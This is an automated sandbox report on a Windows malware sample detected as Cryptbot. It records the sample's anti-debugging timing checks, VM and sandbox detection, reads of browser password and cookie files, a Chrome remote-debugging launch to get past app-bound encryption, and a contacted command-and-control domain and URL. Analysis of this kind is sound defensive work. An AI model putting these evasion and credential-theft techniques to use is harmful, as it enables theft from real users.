Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400AEC second address: 7400AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov edi, ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400AFA second address: 7400B95 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F9CD8F21B01h 0x0000000d sbb cx, EDB6h 0x00000012 jmp 00007F9CD8F21B01h 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d mov esi, 5148CF43h 0x00000022 pushfd 0x00000023 jmp 00007F9CD8F21B08h 0x00000028 xor eax, 50497008h 0x0000002e jmp 00007F9CD8F21AFBh 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 mov cx, DB9Bh 0x0000003c pushfd 0x0000003d jmp 00007F9CD8F21B00h 0x00000042 jmp 00007F9CD8F21B05h 0x00000047 popfd 0x00000048 popad 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400B95 second address: 7400B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400B9C second address: 7400BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400BA2 second address: 7400BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D2A second address: 7400D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D2F second address: 7400D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E6598Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D3D second address: 7400D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D41 second address: 7400D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D50 second address: 7400D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D54 second address: 7400D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400D58 second address: 7400D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F01CC second address: 73F01D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F01D0 second address: 73F01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F01D4 second address: 73F01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F01DA second address: 73F020A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8F21B00h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F020A second address: 73F0226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65998h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0226 second address: 73F0275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0A34h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9CD8F21B02h 0x00000016 adc esi, 77007FE8h 0x0000001c jmp 00007F9CD8F21AFBh 0x00000021 popfd 0x00000022 call 00007F9CD8F21B08h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0275 second address: 73F02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8E6598Eh 0x00000009 sbb ecx, 429A9D78h 0x0000000f jmp 00007F9CD8E6598Bh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov edi, ecx 0x0000001f mov bl, cl 0x00000021 popad 0x00000022 push ecx 0x00000023 pushad 0x00000024 jmp 00007F9CD8E65994h 0x00000029 mov eax, 4F15DEA1h 0x0000002e popad 0x0000002f mov dword ptr [esp], ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F9CD8E65993h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F02DA second address: 73F0311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b jmp 00007F9CD8F21AFEh 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0395 second address: 73F03C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9CD8E6598Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F03C2 second address: 73F03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F03C8 second address: 73F03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0130 second address: 73F0168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebp, esp 0x00000007 jmp 00007F9CD8F21B07h 0x0000000c mov eax, dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9CD8F21B05h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F002C second address: 73F0032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1454B10 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1454BD0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 15F1A06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 14524EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 167B779 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1442 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1467 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1441 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1377 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 2828 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2828 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3332 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3332 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5924 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2056 Thread sleep count: 1442 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2056 Thread sleep time: -2885442s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 344 Thread sleep count: 1467 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 344 Thread sleep time: -2935467s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5308 Thread sleep count: 1441 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5308 Thread sleep time: -2883441s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4432 Thread sleep count: 1377 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4432 Thread sleep time: -2755377s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7816 Thread sleep count: 286 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2034671352.00000196D2038000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00608230 LoadLibraryA,GetProcAddress,FreeLibrary,SleepEx,GetLastError, 8_2_00608230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_0060116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_0060116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00601160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00601160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_006011A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_006013C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1584D0 cpuid 8_2_6C1584D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.service123.exe.6c0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7812, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561480 Sample: file.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 46 Suricata IDS alerts for network traffic 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 6 other signatures 2->52 7 file.exe 5 4 2->7         started        12 service123.exe 2->12         started        process3 dnsIp4 38 fvtekk5pn.top 34.116.198.130, 49730, 49737, 49738 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->38 40 127.0.0.1 unknown unknown 7->40 42 home.fvtekk5pn.top 7->42 32 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->32 dropped 34 C:\Users\user\AppData\...\service123.exe, PE32 7->34 dropped 54 Attempt to bypass Chrome Application-Bound Encryption 7->54 56 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->56 58 Uses schtasks.exe or at.exe to add and modify task schedules 7->58 60 7 other signatures 7->60 14 service123.exe 7->14         started        17 WerFault.exe 21 16 7->17         started        20 chrome.exe 7->20         started        23 schtasks.exe 1 7->23         started        file5 signatures6 process7 dnsIp8 62 Multi AV Scanner detection for dropped file 14->62 64 Found evasive API chain (may stop execution after checking mutex) 14->64 66 Found stalling execution ending in API Sleep call 14->66 30 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->30 dropped 36 239.255.255.250 unknown Reserved 20->36 25 chrome.exe 20->25         started        28 conhost.exe 23->28         started        file9 signatures10 process11 dnsIp12 44 www.google.com 142.250.181.100, 443, 49747 GOOGLEUS United States 25->44
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.181.100 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high